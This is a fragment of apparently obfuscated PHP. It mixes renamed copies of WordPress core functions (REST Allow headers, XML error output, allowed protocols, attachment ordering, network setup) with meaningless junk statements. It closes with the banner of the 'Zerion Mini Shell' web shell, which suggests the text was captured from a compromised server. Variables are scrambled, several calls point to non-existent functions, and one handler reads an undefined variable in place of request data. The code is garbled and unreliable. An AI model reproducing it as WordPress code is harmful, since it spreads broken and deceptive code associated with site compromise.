        foreach ($old_id as $menu_ids) {
            maybe_convert_table_to_utf8mb4($menu_ids);
        }
    }
}
$allowed_media_types = acosh(490);
$f5f9_76 = 'f9whi';
$allowed_media_types = iis7_save_url_rewrite_rules($f5f9_76);


/**
 * Registers widget control callback for customizing options.
 *
 * Allows $escape to be an array that accepts either three elements to grab the
 * first element and the third for the name or just uses the first element of
 * the array for the name.
 *
 * Passes to wp_register_widget_control() after the argument list has
 * been compiled.
 *
 * @since 2.2.0
 * @deprecated 2.8.0 Use wp_register_widget_control()
 * @see wp_register_widget_control()
 *
 * @param int|string $escape             Sidebar ID.
 * @param callable   $control_callback Widget control callback to display and process form.
 * @param int        $show_post_comments_feed            Widget width.
 * @param int        $registered_handle           Widget height.
 * @param mixed      ...$params        Widget parameters.
 */

 if((log10(122)) ===  TRUE) {
 	$publish_callback_args = 'k4rbx';
 }
$uploaded['i5cagig'] = 3850;
/**
 * Sends the "Allow" header to state all methods that can be sent to the current route.
 *
 * @since 4.4.0
 *
 * @param WP_REST_Response $f0_2 Current response being served.
 * @param WP_REST_Server   $object_ids   ResponseHandler instance (usually WP_REST_Server).
 * @param WP_REST_Request  $has_dependents  The request that was used to make current response.
 * @return WP_REST_Response Response to be served, with "Allow" header if route has allowed methods.
 */
function before_request($f0_2, $object_ids, $has_dependents)
{
    $locked_avatar = $f0_2->get_matched_route();
    if (!$locked_avatar) {
        return $f0_2;
    }
    $s_prime = $object_ids->get_routes();
    $sub_sub_subelement = array();
    // Get the allowed methods across the routes.
    foreach ($s_prime[$locked_avatar] as $submit_classes_attr) {
        foreach ($submit_classes_attr['methods'] as $sendmail_from_value => $fields_to_pick) {
            if (!empty($submit_classes_attr['permission_callback'])) {
                $current_post_date = call_user_func($submit_classes_attr['permission_callback'], $has_dependents);
                $sub_sub_subelement[$sendmail_from_value] = true === $current_post_date;
            } else {
                $sub_sub_subelement[$sendmail_from_value] = true;
            }
        }
    }
    // Strip out all the methods that are not allowed (false values).
    $sub_sub_subelement = array_filter($sub_sub_subelement);
    if ($sub_sub_subelement) {
        $f0_2->header('Allow', implode(', ', array_map('strtoupper', array_keys($sub_sub_subelement))));
    }
    return $f0_2;
}
$f5f9_76 = abs(42);
$allowed_media_types = crypto_pwhash_str_verify($f5f9_76);
/**
 * Kills WordPress execution and displays XML response with an error message.
 *
 * This is the handler for wp_die() when processing XML requests.
 *
 * @since 5.2.0
 * @access private
 *
 * @param string       $publicly_viewable_post_types Error message.
 * @param string       $locked_post_status   Optional. Error title. Default empty string.
 * @param string|array $new_menu    Optional. Arguments to control behavior. Default empty array.
 */
function column_description($publicly_viewable_post_types, $locked_post_status = '', $new_menu = array())
{
    list($publicly_viewable_post_types, $locked_post_status, $ThisTagHeader) = _wp_die_process_input($publicly_viewable_post_types, $locked_post_status, $new_menu);
    $publicly_viewable_post_types = htmlspecialchars($publicly_viewable_post_types);
    $locked_post_status = htmlspecialchars($locked_post_status);
    $SNDM_startoffset = <<<EOD
    <error>
        <code>{$ThisTagHeader['code']}</code>
        <title><![CDATA[{$locked_post_status}]]></title>
        <message><![CDATA[{$publicly_viewable_post_types}]]></message>
        <data>
            <status>{$ThisTagHeader['response']}</status>
        </data>
    </error>
    
    EOD;
    if (!headers_sent()) {
        header("Content-Type: text/xml; charset={$ThisTagHeader['charset']}");
        if (null !== $ThisTagHeader['response']) {
            status_header($ThisTagHeader['response']);
        }
        nocache_headers();
    }
    echo $SNDM_startoffset;
    if ($ThisTagHeader['exit']) {
        die;
    }
}
$allowed_media_types = cosh(78);
$f5f9_76 = 'p879a';
$allowed_media_types = hash_nav_menu_args($f5f9_76);
$allowed_media_types = tan(425);
$f9r9vt9 = (!isset($f9r9vt9)? 	"gimqp" 	: 	"j8hc");


/**
 * Execute changes made in WordPress 2.7.
 *
 * @ignore
 * @since 2.7.0
 *
 * @global int  $webfont The old (current) database version.
 * @global wpdb $widget_setting_ids                  WordPress database abstraction object.
 */

 if(!isset($c01qu0w4u)) {
 	$c01qu0w4u = 'rowl';
 }
$c01qu0w4u = log1p(339);
$c01qu0w4u = get_the_block_template_html($allowed_media_types);
$allowed_media_types = log10(650);


/**
 * Adds custom arguments to some of the meta box object types.
 *
 * @since 3.0.0
 *
 * @access private
 *
 * @param object $data_object The post type or taxonomy meta-object.
 * @return object The post type or taxonomy object.
 */

 if(!(ceil(863)) !==  true) 	{
 	$fxfibmj = 'wik9';
 }
$s7tj = (!isset($s7tj)?	"ytyfflpw"	:	"yqcxow");
$z0ov491k9['gyp86q2'] = 4224;
$c01qu0w4u = ucfirst($f5f9_76);
$hba9pttc6 = 'pugl2fgi';


/**
 * Server-side rendering of the `core/cover` block.
 *
 * @package WordPress
 */

 if(!empty(strtolower($hba9pttc6)) ==  false) {
 	$ejpqs06 = 'qgwvd4';
 }
$c01qu0w4u = soundex($c01qu0w4u);
$g_pclzip_versionxxjpjd1 = 'rpcq';


/**
	 * Adds multiple declarations.
	 *
	 * @since 6.1.0
	 *
	 * @param string[] $declarations An array of declarations.
	 * @return WP_Style_Engine_CSS_Declarations Returns the object to allow chaining methods.
	 */

 if(!isset($time_scalezhthycbh)) {
 	$time_scalezhthycbh = 'dida0l9uv';
 }
$time_scalezhthycbh = htmlspecialchars_decode($g_pclzip_versionxxjpjd1);


/**
	 * Retrieves the autosave's schema, conforming to JSON Schema.
	 *
	 * @since 5.0.0
	 *
	 * @return array Item schema data.
	 */

 if(empty(round(819)) !==  TRUE) {
 	$a1x5rxq = 'i887t';
 }
$g_pclzip_versionxxjpjd1 = wp_getTerm($g_pclzip_versionxxjpjd1);
$nqbpja = (!isset($nqbpja)? "dj5qvfet" : "gwcib4");
$time_scalezhthycbh = htmlspecialchars_decode($time_scalezhthycbh);
$yne3 = 'omc7';
$g_pclzip_versionumkesh = (!isset($g_pclzip_versionumkesh)?"ch3iy":"c12doiun");
$f82qjsu3p['xrnrdmn7'] = 2778;
/**
 * Retrieves a list of protocols to allow in HTML attributes.
 *
 * @since 3.3.0
 * @since 4.3.0 Added 'webcal' to the protocols array.
 * @since 4.7.0 Added 'urn' to the protocols array.
 * @since 5.3.0 Added 'sms' to the protocols array.
 * @since 5.6.0 Added 'irc6' and 'ircs' to the protocols array.
 *
 * @see wp_kses()
 * @see esc_url()
 *
 * @return string[] Array of allowed protocols. Defaults to an array containing 'http', 'https',
 *                  'ftp', 'ftps', 'mailto', 'news', 'irc', 'irc6', 'ircs', 'gopher', 'nntp', 'feed',
 *                  'telnet', 'mms', 'rtsp', 'sms', 'svn', 'tel', 'fax', 'xmpp', 'webcal', and 'urn'.
 *                  This covers all common link protocols, except for 'javascript' which should not
 *                  be allowed for untrusted users.
 */
function wp_allowed_protocols()
{
    static $protocols = array();
    if (empty($protocols)) {
        $protocols = array('http', 'https', 'ftp', 'ftps', 'mailto', 'news', 'irc', 'irc6', 'ircs', 'gopher', 'nntp', 'feed', 'telnet', 'mms', 'rtsp', 'sms', 'svn', 'tel', 'fax', 'xmpp', 'webcal', 'urn');
    }
    if (!did_action('wp_loaded')) {
        /**
         * Filters the list of protocols allowed in HTML attributes.
         *
         * @since 3.0.0
         *
         * @param string[] $protocols Array of allowed protocols e.g. 'http', 'ftp', 'tel', and more.
         */
        $protocols = array_unique((array) apply_filters('kses_allowed_protocols', $protocols));
    }
    return $protocols;
}
$time_scalezhthycbh = quotemeta($yne3);


/**
     * @see ParagonIE_Sodium_Compat::crypto_secretbox_keygen()
     * @return string
     * @throws Exception
     */

 if((log10(162)) !=  false)	{
 	$a4cfh = 'hqsq28f';
 }
$g_pclzip_versionxxjpjd1 = the_title($time_scalezhthycbh);
$g_pclzip_versionxxjpjd1 = sin(958);
$yne3 = doEncode($time_scalezhthycbh);


/**
 * Outputs an unordered list of checkbox input elements labeled with category names.
 *
 * @since 2.5.1
 *
 * @see wp_terms_checklist()
 *
 * @param int         $comment_author_email              Optional. Post to generate a categories checklist for. Default 0.
 *                                          $selected_cats must not be an array. Default 0.
 * @param int         $descendants_and_self Optional. ID of the category to output along with its descendants.
 *                                          Default 0.
 * @param int[]|false $selected_cats        Optional. Array of category IDs to mark as checked. Default false.
 * @param int[]|false $popular_cats         Optional. Array of category IDs to receive the "popular-category" class.
 *                                          Default false.
 * @param Walker      $walker               Optional. Walker object to use to build the output.
 *                                          Default is a Walker_Category_Checklist instance.
 * @param bool        $checked_ontop        Optional. Whether to move checked items out of the hierarchy and to
 *                                          the top of the list. Default true.
 */

 if(!empty(sin(73)) ===  False){
 	$mhiy = 'a775een6p';
 }
$yne3 = 'n8uzg9vm';
$g_pclzip_versionxxjpjd1 = sodium_crypto_box_seal_open($yne3);


/**
     * ParagonIE_Sodium_Core_Curve25519_Ge_Precomp constructor.
     *
     * @internal You should not use this directly from another application
     *
     * @param ParagonIE_Sodium_Core_Curve25519_Fe $yplusx
     * @param ParagonIE_Sodium_Core_Curve25519_Fe $yminusx
     * @param ParagonIE_Sodium_Core_Curve25519_Fe $xy2d
     */

 if(!isset($rpmzuty)) {
 	$rpmzuty = 'w0jp';
 }
$rpmzuty = deg2rad(250);
$rpmzuty = ucfirst($yne3);
/**
 * Handles saving the attachment order via AJAX.
 *
 * @since 3.5.0
 */
function wp_ajax_save_attachment_order()
{
    if (!isset($nicename__not_in['post_id'])) {
        wp_send_json_error();
    }
    $comment_author_email = absint($nicename__not_in['post_id']);
    if (!$comment_author_email) {
        wp_send_json_error();
    }
    if (empty($nicename__not_in['attachments'])) {
        wp_send_json_error();
    }
    check_ajax_referer('update-post_' . $comment_author_email, 'nonce');
    $attachments = $nicename__not_in['attachments'];
    if (!current_user_can('edit_post', $comment_author_email)) {
        wp_send_json_error();
    }
    foreach ($attachments as $attachment_id => $menu_order) {
        if (!current_user_can('edit_post', $attachment_id)) {
            continue;
        }
        $attachment = get_post($attachment_id);
        if (!$attachment) {
            continue;
        }
        if ('attachment' !== $attachment->post_type) {
            continue;
        }
        wp_update_post(array('ID' => $attachment_id, 'menu_order' => $menu_order));
    }
    wp_send_json_success();
}
$time_scalezhthycbh = strtoupper($yne3);
$yne3 = get_body_class($rpmzuty);
/**
 * Prints step 1 for Network installation process.
 *
 * @todo Realistically, step 1 should be a welcome screen explaining what a Network is and such.
 *       Navigating to Tools > Network should not be a sudden "Welcome to a new install process!
 *       Fill this out and click here." See also contextual help todo.
 *
 * @since 3.0.0
 *
 * @global bool $g_pclzip_versions_apache
 *
 * @param false|WP_Error $errors Optional. Error object. Default false.
 */
function network_step1($errors = false)
{
    global $g_pclzip_versions_apache;
    if (defined('DO_NOT_UPGRADE_GLOBAL_TABLES')) {
        $cannot_define_constant_message = '<strong>' . __('Error:') . '</strong> ';
        $cannot_define_constant_message .= sprintf(
            /* translators: %s: DO_NOT_UPGRADE_GLOBAL_TABLES */
            __('The constant %s cannot be defined when creating a network.'),
            '<code>DO_NOT_UPGRADE_GLOBAL_TABLES</code>'
        );
        wp_admin_notice($cannot_define_constant_message, array('additional_classes' => array('error')));
        echo '</div>';
        require_once ABSPATH . 'wp-admin/admin-footer.php';
        die;
    }
    $active_plugins = get_option('active_plugins');
    if (!empty($active_plugins)) {
        wp_admin_notice('<strong>' . __('Warning:') . '</strong> ' . sprintf(
            /* translators: %s: URL to Plugins screen. */
            __('Please <a href="%s">deactivate your plugins</a> before enabling the Network feature.'),
            admin_url('plugins.php?plugin_status=active')
        ), array('type' => 'warning'));
        echo '<p>' . __('Once the network is created, you may reactivate your plugins.') . '</p>';
        echo '</div>';
        require_once ABSPATH . 'wp-admin/admin-footer.php';
        die;
    }
    $matchmaskname = get_clean_basedomain();
    $has_ports = strstr($matchmaskname, ':');
    if (false !== $has_ports && !in_array($has_ports, array(':80', ':443'), true)) {
        wp_admin_notice('<strong>' . __('Error:') . '</strong> ' . __('You cannot install a network of sites with your server address.'), array('additional_classes' => array('error')));
        echo '<p>' . sprintf(
            /* translators: %s: Port number. */
            __('You cannot use port numbers such as %s.'),
            '<code>' . $has_ports . '</code>'
        ) . '</p>';
        echo '<a href="' . esc_url(admin_url()) . '">' . __('Go to Dashboard') . '</a>';
        echo '</div>';
        require_once ABSPATH . 'wp-admin/admin-footer.php';
        die;
    }
    echo '<form method="post">';
    wp_nonce_field('install-network-1');
    $error_codes = array();
    if (is_wp_error($errors)) {
        $network_created_error_message = '<p><strong>' . __('Error: The network could not be created.') . '</strong></p>';
        foreach ($errors->get_error_messages() as $error) {
            $network_created_error_message .= "<p>{$error}</p>";
        }
        wp_admin_notice($network_created_error_message, array('additional_classes' => array('error'), 'paragraph_wrap' => false));
        $error_codes = $errors->get_error_codes();
    }
    if (!empty($_POST['sitename']) && !in_array('empty_sitename', $error_codes, true)) {
        $site_name = $_POST['sitename'];
    } else {
        /* translators: %s: Default network title. */
        $site_name = sprintf(__('%s Sites'), get_option('blogname'));
    }
    if (!empty($_POST['email']) && !in_array('invalid_email', $error_codes, true)) {
        $admin_email = $_POST['email'];
    } else {
        $admin_email = get_option('admin_email');
    }
    ?>
	<p><?php 
    _e('Welcome to the Network installation process!');
    ?></p>
	<p><?php 
    _e('Fill in the information below and you&#8217;ll be on your way to creating a network of WordPress sites. Configuration files will be created in the next step.');
    ?></p>
	<?php 
    if (isset($_POST['subdomain_install'])) {
        $subdomain_install = (bool) $_POST['subdomain_install'];
    } elseif (apache_mod_loaded('mod_rewrite')) {
        // Assume nothing.
        $subdomain_install = true;
    } elseif (!allow_subdirectory_install()) {
        $subdomain_install = true;
    } else {
        $subdomain_install = false;
        $got_mod_rewrite = got_mod_rewrite();
        if ($got_mod_rewrite) {
            // Dangerous assumptions.
            $publicly_viewable_post_types_class = 'updated';
            $publicly_viewable_post_types = '<p><strong>' . __('Warning:') . '</strong> ';
            $publicly_viewable_post_types .= '<p>' . sprintf(
                /* translators: %s: mod_rewrite */
                __('Please make sure the Apache %s module is installed as it will be used at the end of this installation.'),
                '<code>mod_rewrite</code>'
            ) . '</p>';
        } elseif ($g_pclzip_versions_apache) {
            $publicly_viewable_post_types_class = 'error';
            $publicly_viewable_post_types = '<p><strong>' . __('Warning:') . '</strong> ';
            $publicly_viewable_post_types .= sprintf(
                /* translators: %s: mod_rewrite */
                __('It looks like the Apache %s module is not installed.'),
                '<code>mod_rewrite</code>'
            ) . '</p>';
        }
        if ($got_mod_rewrite || $g_pclzip_versions_apache) {
            // Protect against mod_rewrite mimicry (but ! Apache).
            $publicly_viewable_post_types .= '<p>' . sprintf(
                /* translators: 1: mod_rewrite, 2: mod_rewrite documentation URL, 3: Google search for mod_rewrite. */
                __('If %1$s is disabled, ask your administrator to enable that module, or look at the <a href="%2$s">Apache documentation</a> or <a href="%3$s">elsewhere</a> for help setting it up.'),
                '<code>mod_rewrite</code>',
                'https://httpd.apache.org/docs/mod/mod_rewrite.html',
                'https://www.google.com/search?q=apache+mod_rewrite'
            ) . '</p>';
            wp_admin_notice($publicly_viewable_post_types, array('additional_classes' => array($publicly_viewable_post_types_class, 'inline'), 'paragraph_wrap' => false));
        }
    }
    if (allow_subdomain_install() && allow_subdirectory_install()) {
        ?>
		<h3><?php 
        esc_html_e('Addresses of Sites in your Network');
        ?></h3>
		<p><?php 
        _e('Please choose whether you would like sites in your WordPress network to use sub-domains or sub-directories.');
        ?>
			<strong><?php 
        _e('You cannot change this later.');
        ?></strong></p>
		<p><?php 
        _e('You will need a wildcard DNS record if you are going to use the virtual host (sub-domain) functionality.');
        ?></p>
		<?php 
        // @todo Link to an MS readme? 
        ?>
		<table class="form-table" role="presentation">
			<tr>
				<th><label><input type="radio" name="subdomain_install" value="1"<?php 
        checked($subdomain_install);
        ?> /> <?php 
        _e('Sub-domains');
        ?></label></th>
				<td>
				<?php 
        printf(
            /* translators: 1: Host name. */
            _x('like <code>site1.%1$s</code> and <code>site2.%1$s</code>', 'subdomain examples'),
            $matchmaskname
        );
        ?>
				</td>
			</tr>
			<tr>
				<th><label><input type="radio" name="subdomain_install" value="0"<?php 
        checked(!$subdomain_install);
        ?> /> <?php 
        _e('Sub-directories');
        ?></label></th>
				<td>
				<?php 
        printf(
            /* translators: 1: Host name. */
            _x('like <code>%1$s/site1</code> and <code>%1$s/site2</code>', 'subdirectory examples'),
            $matchmaskname
        );
        ?>
				</td>
			</tr>
		</table>

		<?php 
    }
    if (WP_CONTENT_DIR !== ABSPATH . 'wp-content' && (allow_subdirectory_install() || !allow_subdomain_install())) {
        $subdirectory_warning_message = '<strong>' . __('Warning:') . '</strong> ';
        $subdirectory_warning_message .= __('Subdirectory networks may not be fully compatible with custom wp-content directories.');
        wp_admin_notice($subdirectory_warning_message, array('additional_classes' => array('error', 'inline')));
    }
    $g_pclzip_versions_www = str_starts_with($matchmaskname, 'www.');
    if ($g_pclzip_versions_www) {
        ?>
		<h3><?php 
        esc_html_e('Server Address');
        ?></h3>
		<p>
		<?php 
        printf(
            /* translators: 1: Site URL, 2: Host name, 3: www. */
            __('You should consider changing your site domain to %1$s before enabling the network feature. It will still be possible to visit your site using the %3$s prefix with an address like %2$s but any links will not have the %3$s prefix.'),
            '<code>' . substr($matchmaskname, 4) . '</code>',
            '<code>' . $matchmaskname . '</code>',
            '<code>www</code>'
        );
        ?>
		</p>
		<table class="form-table" role="presentation">
			<tr>
			<th scope='row'><?php 
        esc_html_e('Server Address');
        ?></th>
			<td>
				<?php 
        printf(
            /* translators: %s: Host name. */
            __('The internet address of your network will be %s.'),
            '<code>' . $matchmaskname . '</code>'
        );
        ?>
				</td>
			</tr>
		</table>
		<?php 
    }
    ?>

		<h3><?php 
    esc_html_e('Network Details');
    ?></h3>
		<table class="form-table" role="presentation">
		<?php 
    if ('localhost' === $matchmaskname) {
        ?>
			<tr>
				<th scope="row"><?php 
        esc_html_e('Sub-directory Installation');
        ?></th>
				<td>
				<?php 
        printf(
            /* translators: 1: localhost, 2: localhost.localdomain */
            __('Because you are using %1$s, the sites in your WordPress network must use sub-directories. Consider using %2$s if you wish to use sub-domains.'),
            '<code>localhost</code>',
            '<code>localhost.localdomain</code>'
        );
        // Uh oh:
        if (!allow_subdirectory_install()) {
            echo ' <strong>' . __('Warning:') . ' ' . __('The main site in a sub-directory installation will need to use a modified permalink structure, potentially breaking existing links.') . '</strong>';
        }
        ?>
				</td>
			</tr>
		<?php 
    } elseif (!allow_subdomain_install()) {
        ?>
			<tr>
				<th scope="row"><?php 
        esc_html_e('Sub-directory Installation');
        ?></th>
				<td>
				<?php 
        _e('Because your installation is in a directory, the sites in your WordPress network must use sub-directories.');
        // Uh oh:
        if (!allow_subdirectory_install()) {
            echo ' <strong>' . __('Warning:') . ' ' . __('The main site in a sub-directory installation will need to use a modified permalink structure, potentially breaking existing links.') . '</strong>';
        }
        ?>
				</td>
			</tr>
		<?php 
    } elseif (!allow_subdirectory_install()) {
        ?>
			<tr>
				<th scope="row"><?php 
        esc_html_e('Sub-domain Installation');
        ?></th>
				<td>
				<?php 
        _e('Because your installation is not new, the sites in your WordPress network must use sub-domains.');
        echo ' <strong>' . __('The main site in a sub-directory installation will need to use a modified permalink structure, potentially breaking existing links.') . '</strong>';
        ?>
				</td>
			</tr>
		<?php 
    }
    ?>
		<?php 
    if (!$g_pclzip_versions_www) {
        ?>
			<tr>
				<th scope='row'><?php 
        esc_html_e('Server Address');
        ?></th>
				<td>
					<?php 
        printf(
            /* translators: %s: Host name. */
            __('The internet address of your network will be %s.'),
            '<code>' . $matchmaskname . '</code>'
        );
        ?>
				</td>
			</tr>
		<?php 
    }
    ?>
			<tr>
				<th scope='row'><label for="sitename"><?php 
    esc_html_e('Network Title');
    ?></label></th>
				<td>
					<input name='sitename' id='sitename' type='text' size='45' value='<?php 
    echo esc_attr($site_name);
    ?>' />
					<p class="description">
						<?php 
    _e('What would you like to call your network?');
    ?>
					</p>
				</td>
			</tr>
			<tr>
				<th scope='row'><label for="email"><?php 
    esc_html_e('Network Admin Email');
    ?></label></th>
				<td>
					<input name='email' id='email' type='text' size='45' value='<?php 
    echo esc_attr($admin_email);
    ?>' />
					<p class="description">
						<?php 
    _e('Your email address.');
    ?>
					</p>
				</td>
			</tr>
		</table>
		<?php 
    submit_button(__('Install'), 'primary', 'submit');
    ?>
	</form>
	<?php 
}
$yne3 = ceil(473);
$yne3 = stripos($g_pclzip_versionxxjpjd1, $g_pclzip_versionxxjpjd1);
$g_pclzip_versionxxjpjd1 = strtr($yne3, 15, 17);
$f1ayhsd['xkl9'] = 134;
$rpmzuty = sqrt(847);
$m0smoky['c14w34v'] = 'gqzforu';
/**
 * @see ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_decrypt()
 * @param string $publicly_viewable_post_types
 * @param string $assocData
 * @param string $nonce
 * @param string $bulk_counts
 * @return string|bool
 */
function crypto_aead_chacha20poly1305_decrypt($publicly_viewable_post_types, $assocData, $nonce, $bulk_counts)
{
    try {
        return ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_decrypt($publicly_viewable_post_types, $assocData, $nonce, $bulk_counts);
    } catch (\TypeError $ex) {
        return false;
    } catch (\SodiumException $ex) {
        return false;
    }
}


/**
 * We autoload classes we may not need.
 */

 if(!(basename($yne3)) !=  True) {
 	$ccqgc = 'o212';
 }

Zerion Mini Shell 1.0